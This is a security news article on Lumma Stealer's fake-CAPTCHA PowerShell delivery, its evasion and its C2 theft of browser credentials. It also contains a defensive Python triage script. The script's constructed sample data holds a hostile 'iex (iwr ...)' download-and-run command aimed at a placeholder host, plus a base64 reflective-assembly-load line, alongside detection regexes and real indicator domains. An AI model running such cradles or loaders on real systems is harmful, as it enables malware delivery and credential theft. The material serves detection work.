Lumma Stealer Upgraded with PowerShell Tools and Advanced Evasion Techniques

According to Sophos Managed Detection and Response (MDR), in September 2024 the notorious Lumma Stealer malware evolved with sophisticated PowerShell tools and advanced evasion tactics, leveraging fake CAPTCHA sites to deceive users.

Active since mid-2022 and offered as Malware-as-a-Service (MaaS) by a presumed Russian developer, Lumma Stealer targets sensitive data such as passwords, session tokens, cryptocurrency wallets, and personal information.

What makes this latest campaign particularly insidious is its use of social engineering, exploiting user trust in CAPTCHA challenges to execute malicious PowerShell commands, often leading to devastating data theft.

Figure: Lumma Stealer attack flow with CAPTCHA abuse

PowerShell-Driven Payloads

Sophos MDR investigations conducted through the fall and winter of 2024-25 reveal the intricate mechanics behind Lumma Stealer’s delivery.

One prominent attack vector involves users being redirected to seemingly legitimate CAPTCHA verification pages that prompt them to paste a malicious PowerShell command into Windows’ Run dialog box or command-line interface.

This command, often hidden behind obfuscated JavaScript, retrieves a script from a remote server, such as “fixedzip.oss-ap-southeast-5.aliyuncs.com,” which then downloads a zipped payload disguised as “ArtistSponsorship.exe.”

According to the Sophos report, this executable drops multiple files, including an obfuscated AutoIt script, into the user’s %temp% directory.

The script connects to command-and-control (C2) servers like “snail-r1ced.cyou” (IP 104.21.84.251 via Cloudflare) to exfiltrate stolen data, including Chrome login credentials and cookies, with alarming precision.

In one observed case, a mere 6.37MB file of sensitive data was successfully transmitted before the process self-terminated.

Another variant involves tricking users into opening a supposed PDF file that is actually a remotely hosted .lnk shortcut, triggering a deeply obfuscated PowerShell script.

This script uses AES encryption and dynamic API resolution; decoding it with tools like CyberChef reveals a portable executable (PE) file designed to download further payloads while masking its intent through layers of base64 encoding and deceptive file paths in %appdata%.

Figure: Lumma Stealer, the poisonous download

The complexity of these evasion techniques, including dynamic loading of malicious code via .NET’s System.Reflection.Assembly class and the use of legitimate-looking IRS PDFs as decoys, underscores the stealer’s ability to bypass traditional defenses.
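The three behaviours described above (a PowerShell download cradle launched from the Run dialog, in-memory assembly loading from base64-decoded bytes, and contact with the named C2 infrastructure) each leave telemetry a defender can match on. The following triage script is an added example, not code from the Sophos report or from this article: it scans constructed, simplified key=value telemetry records (process creation, PowerShell script block text, DNS lookups; the record format is hypothetical) and flags each behaviour. The only real-world values it uses are the two domains quoted in the article; every log line is constructed for illustration.

```python
"""Triage constructed Windows telemetry for the Lumma Stealer delivery
behaviours described in the article (added example, not the report's code).

Record format (hypothetical, constructed for this example):
  type=process parent="..." image="..." cmd="..."
  type=scriptblock text="..."
  type=dns host="..."
"""
import re
from dataclasses import dataclass

# Domains quoted in the article; these are the only non-constructed values here.
ARTICLE_IOC_DOMAINS = {
    "fixedzip.oss-ap-southeast-5.aliyuncs.com",
    "snail-r1ced.cyou",
}

# Command-line cues that a pasted "verification" command fetches and runs
# remote code. Lookarounds keep "-enc" from matching inside longer tokens.
DOWNLOAD_CUES = re.compile(
    r"(?i)(?<![\w-])(iex|invoke-expression|downloadstring|downloadfile|"
    r"invoke-webrequest|iwr|-enc\w*|mshta)(?![\w-])"
)

# Base64 decode feeding System.Reflection.Assembly::Load, in either order.
REFLECTIVE_LOAD = re.compile(
    r"(?i)FromBase64String.*Reflection\.Assembly\]::Load|"
    r"Reflection\.Assembly\]::Load.*FromBase64String"
)

SHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe")


@dataclass
class Finding:
    rule: str
    evidence: str


def parse_kv(line: str) -> dict:
    """Parse 'key=value key2="quoted value"' into a dict (quoted values may contain spaces)."""
    return {
        m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
        for m in re.finditer(r'(\w+)=(?:"([^"]*)"|(\S+))', line)
    }


def triage(events):
    """Return a Finding for every record matching one of the three behaviours."""
    findings = []
    for line in events:
        rec = parse_kv(line)
        kind = rec.get("type")
        if kind == "process":
            parent = rec.get("parent", "").lower()
            image = rec.get("image", "").lower()
            cmd = rec.get("cmd", "")
            # Run dialog launches are children of explorer.exe; a shell child
            # with a download cue is the fake-CAPTCHA "paste this" step.
            if (parent.endswith("\\explorer.exe")
                    and image.endswith(SHELL_IMAGES)
                    and DOWNLOAD_CUES.search(cmd)):
                findings.append(Finding("run-dialog-download-cradle", cmd))
        elif kind == "scriptblock":
            text = rec.get("text", "")
            if REFLECTIVE_LOAD.search(text):
                findings.append(Finding("reflective-assembly-load", text))
        elif kind == "dns":
            host = rec.get("host", "").lower()
            if host in ARTICLE_IOC_DOMAINS:
                findings.append(Finding("article-ioc-domain", host))
    return findings


# Constructed sample telemetry: two benign records mixed with three that
# match. The URL in the first record is a reserved .invalid placeholder.
SAMPLE_EVENTS = [
    r'type=process parent="C:\Windows\explorer.exe" '
    r'image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'cmd="powershell -w hidden -c iex (iwr https://captcha-example.invalid/v.ps1)"',
    r'type=process parent="C:\Windows\explorer.exe" '
    r'image="C:\Windows\System32\notepad.exe" cmd="notepad.exe notes.txt"',
    r'type=process parent="C:\Program Files\Build\agent.exe" '
    r'image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'cmd="powershell -File deploy.ps1"',
    r'type=scriptblock text="$b=[Convert]::FromBase64String($x);'
    r'[System.Reflection.Assembly]::Load($b)"',
    r'type=dns host="snail-r1ced.cyou"',
    r'type=dns host="update.microsoft.com"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.evidence}")
```

The parent-process condition matters: PowerShell spawned by a build agent with a file argument is left alone, while the same binary launched from explorer.exe with an `iex`/`iwr` cradle is flagged. In production the same logic would read Sysmon Event ID 1, PowerShell Event ID 4104 and DNS client logs rather than this constructed format.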

A Growing Threat Landscape for Defenders

The adaptability of Lumma Stealer’s delivery methods poses a significant challenge for cybersecurity defenders.

Reports from Netskope Threat Labs estimate around 5,000 fake CAPTCHA sites may be active in this campaign, amplifying the threat’s reach.

However, the evolving tactics, combining user manipulation with technical sophistication, highlight the need for robust endpoint protection and user education.

Reversing years of ingrained trust in CAPTCHA prompts is a daunting task, but it’s critical as attackers continue to exploit this familiarity.

As Lumma Stealer remains a pervasive threat in 2025, organizations must deploy advanced behavioral analysis and scrutinize network activity for signs of C2 communication or data exfiltration to stay ahead of this cunning infostealer.
